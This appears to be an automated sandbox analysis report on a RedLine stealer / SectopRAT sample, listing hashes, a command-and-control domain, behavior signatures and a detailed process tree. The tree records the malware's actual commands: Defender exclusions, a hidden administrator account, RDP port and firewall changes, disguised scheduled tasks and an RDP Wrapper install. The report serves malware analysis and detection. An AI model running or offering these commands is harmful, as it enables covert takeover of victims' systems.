Overview

overview

10

Static

static

3

04ce5d0bcd...dN.exe

windows7-x64

10

04ce5d0bcd...dN.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 04:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29dN.exe

  • Size

    4.1MB

  • MD5

    3a63a094bced4de6d6d60818b7bbb260

  • SHA1

    924449f5414bc9e4964ba9fec4bb92326befad87

  • SHA256

    04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29d

  • SHA512

    1430317f400623744133efcf09311fd66913bfed8c33bfd4bb6e7336c89d8cedbd234f0f9ddb9ac6e1f4fc0e7a5598f9ed521d784267f0ea106e70d5373376fa

  • SSDEEP

    98304:E1E7x7WKpOEYMP8TTjPnPCDexiO75F1Nv6563Y:E1E7x7WFoEWNO1Nxo

Score
10/10
redlinesectopratads6defense_evasiondiscoveryevasionexecutioninfostealerlateral_movementpersistenceprivilege_escalationratspywarestealertrojan

Malware Config

Extracted

Family

redline

Botnet

ads6

C2

bhajhhsy6.fun:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • Redline family
    redline
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 1 IoCs
  • Sectoprat family
    sectoprat
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

    lateral_movement
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Using powershell.exe command.

    execution
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 2 TTPs 5 IoCs
    evasion
  • Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs
    persistence
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

    discovery
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 3 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
    defense_evasion
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29dN.exe
    "C:\Users\Admin\AppData\Local\Temp\04ce5d0bcdd2e9c5913554cdb726c500e5deb7253f39928aed0f40ae1487b29dN.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\SysWOW64\makecab.exe
      "C:\Windows\System32\makecab.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4056
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c FHaltkaUYOvf & xkCNwAXEEDcq & BsWHxifyTEoE & cmd < Rimasta.xltx
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          4⤵
            PID:2044
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
            Potere.exe.com A
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1080
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com A
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1432
              • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
                C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
                6⤵
                • Executes dropped EXE
                • Drops Chrome extension
                • Suspicious behavior: EnumeratesProcesses
                PID:848
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4760
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
            Riscalda.exe.com Z
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1528
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com Z
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4556
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3876
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
            Desideri.exe.com G
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3564
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com G
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3172
              • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4336
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3488
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2008
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5036
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2096
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2904
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4744
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:3736
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1716
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\1167.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\962.vbs
                  7⤵
                    PID:4524
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\1167.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\962.vbs
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:3404
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\25.vbs" BsuIsYeBFe XSDwEoxCiw "C:\Users\Admin\AppData\Roaming\UFsvtvN\589.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:1660
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\25.vbs" BsuIsYeBFe XSDwEoxCiw "C:\Users\Admin\AppData\Roaming\UFsvtvN\589.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\GUICcTpn.bat" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                      8⤵
                        PID:3284
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "GoogleUpdateTaskMachineUA89"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:544
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "GoogleUpdateTaskMachineUA89"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:436
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\329.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\962.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                      7⤵
                        PID:1876
                        • C:\Windows\SysWOW64\cscript.exe
                          cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\329.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\962.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:5040
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "Adobe Flash Player Updater16"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:3876
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll" /tn "Adobe Flash Player Updater16"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1080
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\UFsvtvN\pNvTxatFeC.bat BsuIsYeBFe XSDwEoxCiw"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:3964
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4636
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            wmic group where sid="S-1-5-32-544" get name /value
                            9⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3544
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:1528
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            wmic group where sid="S-1-5-32-555" get name /value
                            9⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2828
                        • C:\Windows\SysWOW64\net.exe
                          net user BsuIsYeBFe XSDwEoxCiw /add
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:2808
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 user BsuIsYeBFe XSDwEoxCiw /add
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:1740
                        • C:\Windows\SysWOW64\net.exe
                          net localgroup Administrators BsuIsYeBFe /add
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:404
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 localgroup Administrators BsuIsYeBFe /add
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:4544
                        • C:\Windows\SysWOW64\net.exe
                          net localgroup "Remote Desktop Users" BsuIsYeBFe /add
                          8⤵
                          • Remote Service Session Hijacking: RDP Hijacking
                          PID:4916
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 localgroup "Remote Desktop Users" BsuIsYeBFe /add
                            9⤵
                            • Remote Service Session Hijacking: RDP Hijacking
                            • System Location Discovery: System Language Discovery
                            PID:5060
                        • C:\Windows\SysWOW64\net.exe
                          net accounts /maxpwage:unlimited
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:2920
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 accounts /maxpwage:unlimited
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:2276
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v BsuIsYeBFe /t REG_DWORD /d "00000000" /f
                          8⤵
                          • Hide Artifacts: Hidden Users
                          • System Location Discovery: System Language Discovery
                          PID:4904
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4884
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                          8⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:4532
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2036
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4948
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3088
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4848
                        • C:\Windows\SysWOW64\timeout.exe
                          Timeout /t 15
                          8⤵
                          • System Location Discovery: System Language Discovery
                          • Delays execution with timeout.exe
                          PID:5112
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
                        7⤵
                        • Drops file in Program Files directory
                        PID:3012
                        • C:\Windows\SysWOW64\fsutil.exe
                          fsutil dirty query C:
                          8⤵
                            PID:5020
                          • C:\Windows\SysWOW64\sc.exe
                            sc queryex "TermService"
                            8⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:3672
                          • C:\Windows\SysWOW64\find.exe
                            find "STATE"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:3652
                          • C:\Windows\SysWOW64\find.exe
                            find /v "RUNNING"
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:1876
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                            8⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3476
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                            8⤵
                            • Server Software Component: Terminal Services DLL
                            • Executes dropped EXE
                            • Modifies WinLogon
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            PID:2608
                            • C:\Windows\SYSTEM32\netsh.exe
                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                              9⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:4904
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:1304
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2292
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c query session rdp-tcp
                            8⤵
                            • System Location Discovery: System Language Discovery
                            PID:2392
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                            8⤵
                            • Server Software Component: Terminal Services DLL
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:656
                            • C:\Windows\SYSTEM32\netsh.exe
                              netsh advfirewall firewall delete rule name="Remote Desktop"
                              9⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:548
                          • C:\Program Files\RDP Wrapper\RDPWInst.exe
                            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                            8⤵
                            • Server Software Component: Terminal Services DLL
                            • Executes dropped EXE
                            • Modifies WinLogon
                            • Drops file in Program Files directory
                            • System Location Discovery: System Language Discovery
                            PID:3556
                            • C:\Windows\SYSTEM32\netsh.exe
                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                              9⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:3160
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                            8⤵
                              PID:1716
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                              8⤵
                                PID:1824
                              • C:\Windows\SysWOW64\reg.exe
                                reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
                                8⤵
                                  PID:2024
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                  8⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1180
                                  • C:\Windows\SysWOW64\cscript.exe
                                    cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                                    9⤵
                                      PID:4748
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1060
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
                                      9⤵
                                        PID:1828
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2020
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                                      8⤵
                                        PID:440
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                        8⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3232
                                        • C:\Windows\SysWOW64\cscript.exe
                                          cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                          9⤵
                                          • Blocklisted process makes network request
                                          • Drops file in Program Files directory
                                          • System Location Discovery: System Language Discovery
                                          PID:2436
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                        8⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4568
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                          9⤵
                                            PID:3324
                                        • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                          "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4868
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4704
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4740
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2388
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\UFsvtvN\129.vbs" "C:\Users\Admin\AppData\Roaming\UFsvtvN\786.vbs" "VWpGb2JGQlZTbnBrVld4NlYxZFdRMUp0Vlcxa1IwNU9ZMVF4V1ZVd1VqTlNWemswVVRKc00wcHRPVEprYms1MFVsWnJPV1Y2ClFrWlJlbFpEVVdwR1JVeFVZelZTYWtGMENrNUVVWGxSYVRBMVVXdFZORXhVV1hoT2EwVjVUMVJHUjA5RlRrZE5TREE5" "C:\Users\Admin\AppData\Roaming\UFsvtvN\bSR.dll"
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5044
                                        • C:\Windows\SysWOW64\cscript.exe
